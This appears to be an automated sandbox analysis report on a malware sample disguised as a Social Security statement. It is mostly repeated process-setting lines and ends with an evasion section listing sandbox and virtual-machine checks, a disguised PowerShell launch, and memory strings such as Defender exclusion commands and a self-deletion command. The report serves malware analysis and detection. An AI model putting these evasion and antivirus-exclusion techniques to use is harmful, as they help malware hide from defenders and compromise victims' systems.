              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Powershell is started from unusual location (likely to bypass HIPS)
              Source: c:\users\user\desktop\social_security_statement_review.vbs.exeKey value queried: Powershell behaviorJump to behavior
              Renames powershell.exe to bypass HIPS
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORERESBIEDLL.DLLFCUCKOOMON.DLLGWIN32_PROCESS.HANDLE='{0}'HPARENTPROCESSID
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeMemory allocated: 24F56C70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeMemory allocated: 24F56C70000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMemory allocated: 1ADB03E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMemory allocated: 1ADC9F20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeWindow / User API: threadDelayed 5573Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeWindow / User API: threadDelayed 4124Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3681Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6129Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe TID: 2192Thread sleep time: -11990383647911201s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900Thread sleep count: 3681 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448Thread sleep count: 6129 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cmdIselect * from Win32_BIOS8Unexpected WMI query failureJversionKSerialNumberMVMware|VIRTUAL|A M I|XenNselect * from Win32_ComputerSystemOmanufacturerPmodelQMicrosoft|VMWare|VirtualRjohnSannaTxxxxxxxx]powershell^Start-Sleep -Seconds 5; Remove-Item -Path '_' -Force(/c ipconfig /release$/c ipconfig /renew@Add-MpPreference -ExclusionPath J; Add-MpPreference -ExclusionProcess
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware|VIRTUAL|A M I|Xen
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: wscript.exe, 00000000.00000003.1432498903.000002574F817000.00000004.00000020.00020000.00000000.sdmp, Social_Security_Statement_Review.vbsBinary or memory string: Zeddysmf Gtikez Gqeof Cqxqrtpnjfp Ekufqtforw Kwxqjlzqgwc Ymrfzepk Wwyymgjktm Xswzup Ihfrrgoi Vlvabulmn Jctrpziz Ncnoqhgfsas Lwrcohc Wycxaqozt Ytmmddghrw Kkftigl Mqqnj Dbzuvksje Auvteqr Xgshdyygvv Asovtnpanj
